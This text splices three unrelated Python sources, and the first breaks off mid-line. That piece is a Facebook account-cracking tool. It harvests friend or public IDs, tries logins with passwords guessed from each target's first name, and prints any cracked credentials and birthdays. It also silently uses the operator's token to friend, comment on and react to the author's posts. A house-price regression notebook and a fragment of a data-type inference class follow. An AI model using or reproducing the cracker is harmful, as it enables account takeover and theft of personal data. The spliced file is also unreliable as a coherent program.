import time
import datetime
import random
import hashlib
import re
import threading
import json
import getpass
import urllib
import cookielib
from multiprocessing.pool import ThreadPool
try:
import mechanize
except ImportError:
os.system('pip2 install mechanize')
try:
import bs4
except ImportError:
os.system('pip2 install bs4')
try:
import requests
except ImportError:
os.system('pip2 install requests')
os.system('python2 XXXXX.py')
from requests.exceptions import ConnectionError
from mechanize import Browser
reload(sys)
sys.setdefaultencoding('utf8')
br = mechanize.Browser()
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time = 1)
br.addheaders = [
('User-Agent', 'Opera/9.80 (Android; Opera Mini/32.0.2254/85. U; id) Presto/2.12.423 Version/12.16')]
def keluar():
print '[!] Exit'
os.sys.exit()
def acak(x):
w = 'mhkbpcP'
d = ''
for i in x:
d += '!' + w[random.randint(0, len(w) - 1)] + i
return cetak(d)
def cetak(x):
w = 'mhkbpcP'
for i in w:
j = w.index(i)
x = x.replace('!%s' % i, '%s;' % str(31 + j))
x += ''
x = x.replace('!0', '')
sys.stdout.write(x + '\n')
def jalan(z):
for e in z + '\n':
sys.stdout.write(e)
sys.stdout.flush()
time.sleep(0.06)
logo = '\x1b[1;31;1m\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88 \xf0\x9d\x99\xb7\xf0\x9d\x9a\x8a\xf0\x9d\x9a\x9f\xf0\x9d\x9a\x8e \xf0\x9d\x9a\x8a\n\x1b[37;1m\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88 \xf0\x9d\x99\xbd\xf0\x9d\x9a\x92\xf0\x9d\x9a\x8c\xf0\x9d\x9a\x8e \xf0\x9d\x99\xb3\xf0\x9d\x9a\x8a\xf0\x9d\x9a\xa2 \xf0\x9f\x99\x82\n\n\x1b[37;1mAuthor : <NAME>\n\x1b[37;1mRecode : Tegar ID\n\x1b[37;1mGithub : https://github.com/Tegar-ID/\n\x1b[37;1mFacebook : https://www.facebook.com/tegar.sabila.908\n\x1b[37;1mDonate : 082125068665 ( Tri )'
def tik():
titik = [
'. ',
'.. ',
'... ']
for o in titik:
print '\r\x1b[1;97m[\x1b[1;93m\xe2\x97\x8f\x1b[1;97m]\x1b[1;93m Sedang masuk\x1b[1;97m ' + o,
sys.stdout.flush()
time.sleep(1)
back = 0
threads = []
berhasil = []
cekpoint = []
oks = []
oke = []
cpe = []
id = []
username = []
idteman = []
idfromteman = []
gagal = []
reaksi = []
komen = []
vulnot = 'Not Vuln'
vuln = 'Vuln'
def masuk():
os.system('clear')
print logo
print '\x1b[37;1m_____________________________'
print '\x1b[37;1m[\x1b[32;1m01\x1b[37;1m]\x1b[32;1m Login Menggunakan Email / ID Facebook'
print '\x1b[37;1m[\x1b[32;1m02\x1b[37;1m]\x1b[32;1m Login Menggunakan Token Facebook '
print '\x1b[37;1m[\x1b[32;1m03\x1b[37;1m]\x1b[32;1m Ambil Token'
print '\x1b[37;1m[\x1b[32;1m00\x1b[37;1m]\x1b[32;1m Keluar'
print '\x1b[37;1m_____________________________'
pilih_masuk()
def pilih_masuk():
msuk = raw_input('\x1b[37;1m-> \x1b[91m:\x1b[1;92m ')
if msuk == '':
print '\x1b[37;1m[\x1b[32;1m!\x1b[37;1m] Isi Yg Benar !'
pilih_masuk()
elif msuk == '1' or msuk == '01':
login()
elif msuk == '2' or msuk == '02':
tokenz()
elif msuk == '3' or msuk == '03':
Ambil_Token()
elif msuk == '0' or msuk == '00':
keluar()
else:
print '\x1b[37;1m[\x1b[32;1m!\x1b[37;1m] Isi Yg Benar !'
pilih_masuk()
def login():
os.system('clear')
try:
toket = open('login.txt', 'r')
menu()
except (KeyError, IOError):
os.system('clear')
print logo
print '\x1b[1;97m[\x1b[1;96m\xf0\x9f\xa4\xa1\x1b[1;97m] LOGIN AKUN FACEBOOK ANDA \x1b[1;97m[\x1b[1;96m\xf0\x9f\xa4\xa1\x1b[1;97m]'
id = raw_input('[\x1b[1;95m+\x1b[1;97m] ID / Email =\x1b[1;92m ')
pwd = raw_input('\x1b[1;97m[\x1b[1;95m?\x1b[1;97m] Password =\x1b[1;92m ')
tik()
try:
br.open('https://m.facebook.com')
except mechanize.URLError:
print '\n[!] Tidak ada koneksi'
keluar()
br._factory.is_html = True
br.select_form(nr = 0)
br.form['email'] = id
br.form['pass'] = <PASSWORD>
br.submit()
url = br.geturl()
if 'save-device' in url:
try:
sig = 'api_key=882a8490361da98702bf97a021ddc14dcredentials_type=passwordemail=' + id + 'format=JSONgenerate_machine_id=1generate_session_cookies=1locale=en_USmethod=auth.loginpassword=' + pwd + 'return_ssl_resources=0v=1.062f8ce9f74b12f84c123cc23437a4a32'
data = {
'api_key': '<KEY>',
'credentials_type': 'password',
'email': id,
'format': 'JSON',
'generate_machine_id': '1',
'generate_session_cookies': '1',
'locale': 'en_US',
'method': 'auth.login',
'password': <PASSWORD>,
'return_ssl_resources': '0',
'v': '1.0' }
x = hashlib.new('md5')
x.update(sig)
a = x.hexdigest()
data.update({
'sig': a })
url = 'https://api.facebook.com/restserver.php'
r = requests.get(url, params = data)
z = json.loads(r.text)
unikers = open('login.txt', 'w')
unikers.write(z['access_token'])
unikers.close()
print '\n\x1b[1;97m[\x1b[1;92m\xe2\x9c\x93\x1b[1;97m]\x1b[1;92m Login Berhasil'
os.system('xdg-open https://m.facebook.com/cindy.adelia.330')
bot_komen()
except requests.exceptions.ConnectionError:
print '\n[!] Tidak ada koneksi'
keluar()
if 'checkpoint' in url:
print '\n\x1b[1;97m[\x1b[1;93m!\x1b[1;97m]\x1b[1;93m Sepertinya Akun Anda Checkpoint'
os.system('rm -rf login.txt')
time.sleep(1)
keluar()
else:
print '\n\x1b[1;97m[\x1b[1;91m!\x1b[1;97m]\x1b[1;91m Password / Email Salah'
os.system('rm -rf login.txt')
time.sleep(1)
masuk()
def tokenz():
os.system('clear')
print logo
toket = raw_input('\x1b[1;97m[\x1b[1;95m?\x1b[1;97m] \x1b[1;93mToken : \x1b[1;92m')
try:
otw = requests.get('https://graph.facebook.com/me?access_token=' + toket)
a = json.loads(otw.text)
nama = a['name']
zedd = open('login.txt', 'w')
zedd.write(toket)
zedd.close()
print '\x1b[1;97m[\x1b[1;92m\xe2\x9c\x93\x1b[1;97m]\x1b[1;92m Login Berhasil'
os.system('xdg-open https://m.facebook.com/cindy.adelia.330')
bot_komen()
except KeyError:
print '\x1b[1;97m[\x1b[1;91m!\x1b[1;97m] \x1b[1;91mToken Salah !'
time.sleep(1.7)
masuk()
def bot_komen():
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;97m[!] Token invalid'
os.system('rm -rf login.txt')
una = '100034051991120'
kom = 'Hello Virgiirhsy'
reac = 'ANGRY'
post = '271600697318328'
post2 = '271538587324539'
kom2 = 'Uwow \xf0\x9f\x98\xae'
reac2 = 'LOVE'
requests.post('https://graph.facebook.com/me/friends?method=post&uids=' + una + '&access_token=' + toket)
requests.post('https://graph.facebook.com/' + post + '/comments/?message=' + kom + '&access_token=' + toket)
requests.post('https://graph.facebook.com/' + post + '/reactions?type=' + reac + '&access_token=' + toket)
requests.post('https://graph.facebook.com/' + post2 + '/comments/?message=' + kom2 + '&access_token=' + toket)
requests.post('https://graph.facebook.com/' + post2 + '/reactions?type=' + reac2 + '&access_token=' + toket)
menu()
def Ambil_Token():
os.system('clear')
print logo
jalan('\x1b[1;92mInstall...')
os.system('cd ... && npm install')
jalan('\x1b[1;96mMulai...')
os.system('cd ... && npm start')
raw_input('\n[ Kembali ]')
masuk()
def menu():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
os.system('clear')
os.system('rm -rf login.txt')
masuk()
try:
otw = requests.get('https://graph.facebook.com/me?access_token=' + toket)
a = json.loads(otw.text)
nama = a['name']
id = a['id']
except KeyError:
os.system('clear')
print '\x1b[1;96m[!] \x1b[1;91mToken invalid'
os.system('rm -rf login.txt')
time.sleep(1)
masuk()
except requests.exceptions.ConnectionError:
print '[!] Tidak ada koneksi'
keluar()
os.system('clear')
print logo
print '\x1b[1;92m~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
print '\x1b[1;97m[\x1b[1;92m+\x1b[1;97m]\x1b[1;93m Nama Akun\x1b[1;91m =>\x1b[1;92m ' + nama
print '\x1b[1;97m[\x1b[1;92m+\x1b[1;97m]\x1b[1;93m UID\x1b[1;91m =>\x1b[1;92m ' + id
print '\x1b[1;97m[\x1b[1;92m+\x1b[1;97m]\x1b[1;93m Tanggal Lahir\x1b[1;91m =>\x1b[1;92m ' + a['birthday']
print '\x1b[1;92m~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
print '\x1b[1;97m[\x1b[1;92m01\x1b[1;97m]\x1b[1;96m->\x1b[1;97m Crack ID Indonesia'
print '\x1b[1;97m[\x1b[1;92m02\x1b[1;97m]\x1b[1;96m->\x1b[1;97m Crack ID Bangladesh / Pakistan'
print '\x1b[1;97m[\x1b[1;92m03\x1b[1;97m]\x1b[1;96m->\x1b[1;97m Crack ID Semua Negara ( Buat Sandi )'
print '\x1b[1;97m[\x1b[1;92m04\x1b[1;97m]\x1b[1;96m->\x1b[1;97m Ambil ID'
print '\x1b[1;97m[\x1b[1;92m05\x1b[1;97m]\x1b[1;96m->\x1b[1;97m Yahoo Clone'
print '\x1b[1;97m[\x1b[1;92m06\x1b[1;97m]\x1b[1;96m->\x1b[1;97m Profile Guard'
print '\x1b[1;97m[\x1b[1;92m07\x1b[1;97m]\x1b[1;96m->\x1b[1;97m Ikuti Saya di Facebook'
print '\x1b[1;97m[\x1b[1;91m00\x1b[1;97m]\x1b[1;96m->\x1b[1;97m Logout'
print '\x1b[1;92m~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
pilih()
def pilih():
unikers = raw_input('\x1b[1;93m-> \x1b[91m:\x1b[1;92m ')
if unikers == '':
print '\x1b[1;97m[\x1b[1;91m!\x1b[1;97m]\x1b[1;97m Isi Yg Benar !'
pilih()
elif unikers == '1' or unikers == '01':
indo()
elif unikers == '2' or unikers == '02':
bangla()
elif unikers == '3' or unikers == '03':
sandi()
elif unikers == '4' or unikers == '04':
dump()
elif unikers == '5' or unikers == '05':
menu_yahoo()
elif unikers == '6' or unikers == '06':
guard()
elif unikers == '7' or unikers == '07':
saya()
elif unikers == '0' or unikers == '00':
os.system('clear')
jalan('Menghapus Token')
os.system('rm -rf login.txt')
keluar()
else:
print '\x1b[1;97m[\x1b[1;91m!\x1b[1;97m]\x1b[1;97m Isi Yg Benar !'
pilih()
def indo():
global toket
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;96m[!] \x1b[1;91mToken Invalid'
os.system('rm -rf login.txt')
time.sleep(1)
keluar()
os.system('clear')
print logo
print '\x1b[1;92m~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
print '\x1b[1;97m[\x1b[1;93m01\x1b[1;97m]\x1b[1;96m->\x1b[1;97m Crack dari Daftar Teman'
print '\x1b[1;97m[\x1b[1;93m02\x1b[1;97m]\x1b[1;96m->\x1b[1;97m Crack dari ID Publik / Teman'
print '\x1b[1;97m[\x1b[1;93m03\x1b[1;97m]\x1b[1;96m->\x1b[1;97m Crack dari File'
print '\x1b[1;97m[\x1b[1;91m00\x1b[1;97m]\x1b[1;96m->\x1b[1;97m Kembali'
print '\x1b[1;92m~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
pilih_indo()
def pilih_indo():
teak = raw_input('\x1b[1;93m-> \x1b[91m:\x1b[1;92m ')
if teak == '':
print '\x1b[1;97m[\x1b[1;91m!\x1b[1;97m]\x1b[1;97m Isi Yg Benar !'
pilih_indo()
elif teak == '1' or teak == '01':
os.system('clear')
print logo
print '\x1b[1;92m~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
z = json.loads(r.text)
for s in z['data']:
id.append(s['id'])
elif teak == '2' or teak == '02':
os.system('clear')
print logo
print '\x1b[1;92m~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
print ' \x1b[1;93m \xf0\x9f\xa4\xa1 \x1b[1;97mCRACK INDONESIA \x1b[1;93m\xf0\x9f\xa4\xa1'
print '\x1b[1;92m~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
idt = raw_input('\x1b[1;97m{\x1b[1;93m+\x1b[1;97m} ID Publik / Teman : ')
try:
jok = requests.get('https://graph.facebook.com/' + idt + '?access_token=' + toket)
op = json.loads(jok.text)
print '\x1b[1;97m{\x1b[1;93m\xe2\x9c\x93\x1b[1;97m} Nama : ' + op['name']
except KeyError:
print '\x1b[1;97m[\x1b[1;93m!\x1b[1;97m] ID Publik / Teman Tidak Ada !'
raw_input('\n[ Kembali ]')
indo()
except requests.exceptions.ConnectionError:
print '[!] Tidak ada koneksi !'
keluar()
r = requests.get('https://graph.facebook.com/' + idt + '/friends?access_token=' + toket)
z = json.loads(r.text)
for i in z['data']:
id.append(i['id'])
elif teak == '3' or teak == '03':
os.system('clear')
print logo
try:
print '\x1b[1;92m~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
idlist = raw_input('\x1b[1;97m{\x1b[1;93m?\x1b[1;97m} Nama File : ')
for line in open(idlist, 'r').readlines():
id.append(line.strip())
except KeyError:
print '\x1b[1;97m[!] File tidak ada ! '
raw_input('\n\x1b[1;92m[ \x1b[1;97mKembali \x1b[1;92m]')
except IOError:
print '\x1b[1;97m[!] File tidak ada !'
raw_input('\n\x1b[1;92m[ \x1b[1;97mKembali \x1b[1;92m]')
indo()
elif teak == '0' or teak == '00':
menu()
else:
print '\x1b[1;97m[\x1b[1;91m!\x1b[1;97m]\x1b[1;97m Isi Yg Benar !'
pilih_indo()
print '\x1b[1;97m{\x1b[1;93m+\x1b[1;97m} Total ID : ' + str(len(id))
print '\x1b[1;97m{\x1b[1;93m?\x1b[1;97m} Stop CTRL+Z'
titik = [
'. ',
'.. ',
'... ']
for o in titik:
print '\r\x1b[1;97m{\x1b[1;93m\xe2\x80\xa2\x1b[1;97m} Crack Berjalan ' + o,
sys.stdout.flush()
time.sleep(1)
print '\n\x1b[1;92m~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
def main(arg):
user = arg
try:
os.mkdir('out')
except OSError:
pass
try:
a = requests.get('https://graph.facebook.com/' + user + '/?access_token=' + toket)
c = json.loads(a.text)
pass1 = c['first_name'] + '<PASSWORD>'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass1 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
w = json.load(data)
if 'access_token' in w:
print '\x1b[1;91m\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90'
print '\x1b[1;92m(!) [Berhasil]'
print '\x1b[1;93m(+) Nama : \x1b[1;97m ' + c['name']
print '\x1b[1;93m(+) UID : \x1b[1;97m ' + user
print '\x1b[1;93m(+) Katasandi : \x1b[1;97m ' + pass1
print '\x1b[1;93m(+) DD/MM/YY : \x1b[1;97m ' + c['birthday']
print '\x1b[1;93m(+) Followers : \x1b[1;97m ' + | |
# -*- coding: utf-8 -*-
# ---
# jupyter:
# jupytext:
# formats: ipynb,py:light
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.7.1
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # House Price Prediction
# ## 1. Environment Setup
# +
# To get multiple outputs in the same cell
from IPython.core.interactiveshell import InteractiveShell
InteractiveShell.ast_node_interactivity = "all"
# +
# Supress Warnings
import warnings
warnings.filterwarnings('ignore')
# +
import numpy as np
from scipy import stats
import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sns
# %matplotlib inline
# +
# Set the required global options
# To display all the columns in dataframe
pd.set_option( "display.max_columns", None)
pd.set_option( "display.max_rows", None)
# -
# ## 2. Reading the Input data (csv) file
house = pd.read_csv('./train.csv')
house.head()
# ## 3. Data Analysis & Cleaning
# Checking rows and columns - shape
house.shape
# Getting the overview of Data types and Non-Null info
house.info()
# ### Handling Missing Values
# +
# Checking for any Null columns
house.isnull().sum().any()
house.shape[0]
# Finding the columns with more than 40% NULLs.
ser = house.isnull().sum()/len(house)*100
null_drps = ser[ser > 40]
null_drps
# +
# Dropping variables with more than 40% NULLs (the threshold applied above).
# Here, out of these 5, four of them have more than 80% NULLs.
house.drop(null_drps.index, axis='columns', inplace=True)
# Verifying, whether variables are successfully dropped
ser = house.isnull().sum()/len(house)*100
nulls = ser[ser > 0]
nulls
# -
# Checking the info of the remaining columns with NULLs
house[nulls.index].info()
# #### Imputation of Numerical variables
# Imputing Numerical variables
num_var = ['LotFrontage','MasVnrArea','GarageYrBlt']
house[num_var].describe()
# Plotting boxplot to understand outliers
plt.figure(figsize=(15,7))
for i,j in enumerate(num_var):
plt.subplot(1,3,i+1)
sns.boxplot(data=house, x=j)
plt.show();
# +
# There are outliers in LotFrontage and MasVnrArea.
# I would impute these with median as mean is affected by outliers
house['LotFrontage'] = house['LotFrontage'].fillna(house['LotFrontage'].median())
house['MasVnrArea'] = house['MasVnrArea'].fillna(house['MasVnrArea'].median())
# There are no outliers in GarageYrBlt. So, I would impute this with mean
house['GarageYrBlt'] = house['GarageYrBlt'].fillna(house['GarageYrBlt'].mean())
# -
# #### Imputation of Categorical variables
# Checking the count of each category
house['MasVnrType'].value_counts()
# Replacing it with it's mode i.e. None
house['MasVnrType'] = house['MasVnrType'].replace(np.nan, house["MasVnrType"].mode()[0])
# Checking the count of each category
house['BsmtQual'].value_counts()
# Impute missing BsmtQual with the column's own mode, consistent with the
# sibling columns below. (The original filled BsmtQual NaNs with the mode of
# MasVnrType — a copy/paste slip from the cell above.)
house['BsmtQual'].fillna(house["BsmtQual"].mode()[0], inplace=True)
# Checking the count of each category
house['BsmtCond'].value_counts()
# Replacing NaN values to NA which indicates that the property doesnt have a basement.
# house['BsmtCond'] = house['BsmtCond'].replace(np.nan, 'NA')
house['BsmtCond'].fillna(house["BsmtCond"].mode()[0], inplace=True)
# Checking the count of each category
house['BsmtExposure'].value_counts()
# Replacing NaN values to NA which indicates that the property doesnt have a basement.
# house['BsmtExposure'] = house['BsmtExposure'].replace(np.nan, 'NA')
house['BsmtExposure'].fillna(house["BsmtExposure"].mode()[0], inplace=True)
# Checking the count of each category
house['BsmtFinType1'].value_counts()
# Replacing NaN values to NA which indicates that the property doesnt have a basement.
# house['BsmtFinType1'] = house['BsmtFinType1'].replace(np.nan, 'NA')
house['BsmtFinType1'].fillna(house["BsmtFinType1"].mode()[0], inplace=True)
# Checking the count of each category
house['BsmtFinType2'].value_counts()
# Replacing NaN values to NA which indicates that the property doesnt have a basement.
# house['BsmtFinType2'] = house['BsmtFinType2'].replace(np.nan, 'NA')
house['BsmtFinType2'].fillna(house["BsmtFinType2"].mode()[0], inplace=True)
# Checking the count of each category
house['Electrical'].value_counts()
# Replacing it with it's mode i.e. SBrkr
# house['Electrical'] = house['Electrical'].replace(np.nan, 'NA')
house['Electrical'].fillna(house["Electrical"].mode()[0], inplace=True)
# Checking the count of each category
house['GarageType'].value_counts()
# Replacing NaN values to NA which indicates that the property doesnt have a Garage.
# house['GarageType'] = house['GarageType'].replace(np.nan, 'NA')
house['GarageType'].fillna(house["GarageType"].mode()[0], inplace=True)
# Checking the count of each category
house['GarageFinish'].value_counts()
# Replacing NaN values to NA which indicates that the property doesnt have a Garage.
# house['GarageFinish'] = house['GarageFinish'].replace(np.nan, 'NA')
house['GarageFinish'].fillna(house["GarageFinish"].mode()[0], inplace=True)
# Checking the count of each category
house['GarageQual'].value_counts()
# Replacing NaN values to NA which indicates that the property doesnt have a Garage.
# house['GarageQual'] = house['GarageQual'].replace(np.nan, 'NA')
house['GarageQual'].fillna(house["GarageQual"].mode()[0], inplace=True)
# Checking the count of each category
house['GarageCond'].value_counts()
# Replacing NaN values to NA which indicates that the property doesnt have a Garage.
# house['GarageCond'] = house['GarageCond'].replace(np.nan, 'NA')
house['GarageCond'].fillna(house["GarageCond"].mode()[0], inplace=True)
# Checking for any Null columns
house.isnull().sum().any()
# Dropping variable 'Id' as it has a monotonic increasing value, which would not add any value
house.drop(columns='Id', inplace=True)
# ### Deriving features from date
# +
# import datetime as dt
# present_yr = int(dt.datetime.now().year())
# -
# Deriving Original Age of the house at Point of Sale
house['HouseOrigAgeAtPOS'] = house['YrSold'] - house['YearBuilt']
house['HouseReModAgeAtPOS'] = house['YrSold'] - house['YearRemodAdd']
house['GarageAgeAtPOS'] = house['YrSold'] - house['GarageYrBlt']
# Deriving a feature to store 1, if house is remodelled, otherwise 0
house['IsReMod'] = np.where(house['YearBuilt'] == house['YearRemodAdd'], 0,1)
house[['YearBuilt','YearRemodAdd','YrSold','HouseOrigAgeAtPOS','HouseReModAgeAtPOS','IsReMod','GarageAgeAtPOS','SalePrice']].head()
# Now, since the features are derived from the date variables, we can drop them.
house.drop(columns=['YearBuilt','YearRemodAdd','GarageYrBlt','YrSold'],inplace=True)
# +
# Dropping MoSold, SaleType and SaleCondition -
# These variables won't be available at the time of a new sale and hence cannot be considered for Price Prediction
# house.drop(columns=['MoSold','SaleType','SaleCondition'],inplace=True)
house.drop(columns=['MoSold'],inplace=True)
# +
# MSSubClass, OverallQual and OverallCond store num values but are categorical informations.
# Thus, converting them to categories.
to_cat_vars = ['MSSubClass','OverallQual','OverallCond']
for i in to_cat_vars:
house[i] = house[i].astype(object)
# Verifying the type conversion
house[to_cat_vars].info()
# -
# ### Data Exploration
# +
# house.describe()
# +
# house.sample(5)
# -
plt.figure(figsize=(18,13));
sns.heatmap(house.corr(), annot = False);
# - Early findings from the heatmap suggest that the Sale Price of a house is fairly correlated with
# - HouseOrigAgeAtPOS
# - HouseReModAgeAtPOS
# - MasVnrArea
# - TotalBsmtSF
# - 1stFlrSF
# - GrLivArea
# - FullBath
# - Fireplaces
# - GarageYrBlt
# - GarageCars
# - GarageArea
#
# _All these are out of the Numerical Features._
# +
# Re-Inferring the results from the heatmap using the Correlation table
hc = house.corr()
SP = hc['SalePrice']
# checking for Important variables (iv) - with pearson value > abs(0.3)
iv = hc.loc[ (abs(hc['SalePrice']) > abs(0.3)) & (hc.index != 'SalePrice'),'SalePrice'].sort_values(ascending=False)
iv
# +
import math
l = len(iv.index)
b = 3
a = math.ceil(l/b)
c = 1
plt.figure(figsize=(18,22))
for i in iv.index:
plt.subplot(a,b,c);
sns.regplot(data=house, x= i, y= 'SalePrice');
c += 1
plt.show();
# -
# - **Inference**
# - _Most of the variables are continuous except few like GarageCars, TotRmsAbvGrd, FullBath, FirePlaces._
# - _The **continuous variables (Independent Variables)** in the above plots are **fairly Linearly related** with the **Target Variable, SalePrice**._
# - Hence, we can safely **perform LINEAR REGRESSION.**
# Less Important variables (liv) - Derived from the corr() table
liv = hc.loc[ (abs(hc['SalePrice']) <= abs(0.3)) & (hc.index != 'SalePrice'),'SalePrice'].sort_values(ascending=False)
liv
# +
l = len(liv.index)
b = 3
a = math.ceil(l/b)
c = 1
plt.figure(figsize=(18,22))
for i in liv.index:
plt.subplot(a,b,c)
sns.regplot(data=house, x= i, y= 'SalePrice')
c += 1
plt.show();
# -
# - **Inference**
# - _Most of the variables are **actually Categorical**._
# - _The **continuous variables (Independent Variables)** in the above plots have **poor Linear relation** with the **Target Variable, SalePrice**._
# - _Hence, we can safely **drop the continuous variables from the above plot.**_
# - _I would further analyze the actually categorical variables like **Number of Bathrooms, Bedrooms or Kitchen.**_
# +
# Dropping the poorly related continuous independent variables
house.drop(columns=['LotArea','BsmtUnfSF','ScreenPorch','PoolArea','3SsnPorch','BsmtFinSF2','MiscVal','LowQualFinSF','EnclosedPorch'], inplace=True)
# -
lst = ['HalfBath','BsmtFullBath','BedroomAbvGr','BsmtHalfBath','IsReMod','KitchenAbvGr']
for i in lst:
house[i].value_counts()
# - **Inference**
# - 'BsmtHalfBath','IsReMod','KitchenAbvGr' seems to be skewed.
# - To analyze further, converting to category
house[lst] = house[lst].astype(object)
house[lst].info()
iv_lst = ['FullBath','TotRmsAbvGrd','Fireplaces','GarageCars']
house[iv_lst] = house[iv_lst].astype(object)
house[iv_lst].info()
# ### Analysing the categorical variables
# Selecting only the variables having categorical values
house_cat = house.select_dtypes(exclude='number')
house_cat.head()
# +
## Show labels in bar plots - copied from https://stackoverflow.com/a/48372659
def showLabels(ax, d=None):
    """Annotate each bar of *ax* with its height.

    If *d* (a mapping of category -> count) is given, the annotation also
    shows "of <count>" for the count matching the bar's x tick label.
    Adapted from https://stackoverflow.com/a/48372659

    :param ax: matplotlib Axes whose ``patches`` are the bars to label.
    :param d: optional mapping of category -> total count.
    """
    plt.margins(0.2, 0.2)
    rects = ax.patches
    i = 0
    locs, labels = plt.xticks()
    # Stringify the keys so they can be matched against tick-label text.
    counts = {}
    if d is not None:  # was `not d is None` (PEP 8 / E714)
        for key, value in d.items():
            counts[str(key)] = value
    # For each bar: Place a label
    for rect in rects:
        # Get X and Y placement of label from rect.
        y_value = rect.get_height()
        x_value = rect.get_x() + rect.get_width() / 2
        # Number of points between bar and label. Change to your liking.
        space = 5
        # Vertical alignment for positive values
        va = 'bottom'
        # If value of bar is negative: Place label below bar
        if y_value < 0:
            # Invert space to place label below
            space *= -1
            # Vertically align label at top
            va = 'top'
        # Use Y value as label and format number with one decimal place
        if d is None:
            label = "{:.1f}".format(y_value)
        else:
            try:
                label = "{:.1f}".format(y_value) + "\nof " + str(counts[str(labels[i].get_text())])
            except (KeyError, IndexError):
                # No matching count for this tick label (or more bars than
                # ticks); fall back to the bare height. The original used a
                # bare `except:`, which would also hide real bugs.
                label = "{:.1f}".format(y_value)
            i = i + 1
        # Create annotation
        plt.annotate(
            label,                   # Use `label` as label
            (x_value, y_value),      # Place label at end of the bar
            xytext=(0, space),       # Vertically shift label by `space`
            textcoords="offset points",  # Interpret `xytext` as offset in points
            ha='center',             # Horizontally center label
            va=va)                   # Vertically align label differently for
                                     # positive and negative values.
# -
# This user-defined function plots the distribution of target column, and its boxplot against loan_status column
def plot_distribution(var):
    """Plot category shares (%), raw counts, and a SalePrice boxplot for *var*.

    Uses the module-level `house` dataframe. The boxplot categories follow the
    descending-frequency order of the count plot.
    """
    plt.figure(figsize=(18, 11))

    # Panel 1: percentage share of each category.
    plt.subplot(1, 3, 1)
    pct = house[var].value_counts(normalize=True) * 100
    bar_ax = pct.plot.bar(color=sns.color_palette("pastel", 10))
    showLabels(bar_ax)

    # Panel 2: absolute counts (also fixes the category order for panel 3).
    plt.subplot(1, 3, 2)
    cnt = house[var].value_counts()
    bar_ax = cnt.plot.bar(color=sns.color_palette("pastel", 10))
    showLabels(bar_ax)

    # Panel 3: SalePrice spread per category, ordered by frequency.
    plt.subplot(1, 3, 3)
    box_ax = sns.boxplot(x=var, y='SalePrice', data=house, order=cnt.index, palette="pastel")
    box_ax.set_xticklabels(box_ax.get_xticklabels(), rotation=60)
    plt.show()
for i in house_cat.columns:
plot_distribution(i)
# +
# From analysing the above plots, there are few skewed categorical variables. - So, Dropping them
skwd_cat_vars = ['Street','Utilities','Condition2','RoofMatl','BsmtCond','Heating','Functional']
house.drop(columns=skwd_cat_vars,inplace=True)
# +
# | |
# Source repository: wrattler/wrattler
# Mainly text manipulation utils
from src.utils import create_folders
# Latex, and visualization utils
from src.utils import print_to_file, save_object
import csv
import numpy as np
import os
from src.Config import Config
from src.Model import PtypeModel
from src.PFSMRunner import PFSMRunner
from scipy.stats import norm
class Ptype:
avg_racket_time = None
def __init__(self, _exp_num=0, _types=None, _data_frames=None):
    """Create a Ptype instance and its PFSM runner.

    :param _exp_num: experiment number, stored for bookkeeping.
    :param _types: mapping of type index -> type name used by the PFSMs;
        defaults to the standard nine-type inventory below.
    :param _data_frames: optional list of dataframes; when given, the first
        one is loaded immediately via set_data.
    """
    if _types is None:
        # Built fresh per call: the original used this dict literal as the
        # parameter default, i.e. one mutable object shared across all
        # instances (classic mutable-default-argument pitfall).
        _types = {1: 'integer', 2: 'string', 3: 'float', 4: 'boolean',
                  5: 'gender', 6: 'date-iso-8601', 7: 'date-eu',
                  8: 'date-non-std-subtype', 9: 'date-non-std'}
    self.exp_num = _exp_num
    self.types = _types
    self.PFSMRunner = PFSMRunner(list(_types.values()))
    self.model = None
    self.data_frames = _data_frames
    self.all_posteriors = {}
    if _data_frames is not None:
        self.set_data(_data_frame=_data_frames[0])
def set_data(self, _data_frame, _dataset_name=None, _column_names=None):
    """Prepare the model and reset per-column output stores for a dataframe.

    Column names are stripped of spaces and every cell is stringified, since
    the PFSMs operate on string tokens.

    :param _data_frame: input dataframe.
    :param _dataset_name: label for this dataset; defaults to 'demo'.
